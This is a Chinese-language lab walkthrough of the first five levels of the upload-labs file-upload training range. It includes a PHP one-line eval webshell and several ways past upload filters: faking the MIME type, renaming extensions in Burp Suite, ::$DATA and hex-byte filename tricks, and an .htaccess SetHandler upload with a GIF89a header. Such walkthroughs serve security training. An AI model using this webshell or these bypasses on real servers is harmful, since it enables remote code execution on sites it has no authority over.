我用的小皮面板pro版本搭建的环境,出现了n多问题,见谅
php版本5.3.29nts
shell.php <?php @eval($_POST['x']);?>
黑名单绕过
Less-1(前端验证)
方法一:使用超级火狐进行修改前端页面
修改这条语句为,点击提交
复制图像地址打开输入post型x=phpinfo();,成功
方法二:bp抓包改filename
修改php后缀为png,上传时bp抓包
修改为shell2.php,放包,成功
Less--2(MIME验证)
采用文件类型修改
shell.php的上传类型修改为png上传的文件类型image/png
放包成功
Less-3
方法一:php环境版本问题失败
原理:利用对方服务器解析修改后缀为php3、php5、phptml
条件:把httpd.conf里的 AddType application/x-httpd-php .php .phtml .php3 .php5
#去掉
方法二:16进制过滤
1.trim和deldot函数可以删掉连续的多个空格和点,但str_ireplace函数只能替换掉一个::$DATA,因此本关可以文件末尾双写::$DATA绕过过滤
2.trim函数仅仅是去掉空格,不能去掉空白字符。因此本关可以通过在sh.php文件名末尾加十六进制81~99(比如下图中加的是0x88)来绕过后缀黑名单限制。
此方法借鉴于CSDN博主「仙女象」的博客,十分感谢
原文链接:https://blog.csdn.net/elephantxiang/article/details/120660685
Less-4
phpstudy 环境问题失败
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
php环境问题失败,
修改apache的httpd.conf配置AllowOverride None,把None改为All,重启phpstudy的apache,再上传.htaccess文件
SetHandler application/x-httpd-php
然后上传一句话木马以jpg格式,在一句话木马前添加GIF89a图片头文件
可用方法:可以用第3关16进制绕过
Less-5
抓包,在filename后改为shell.php. .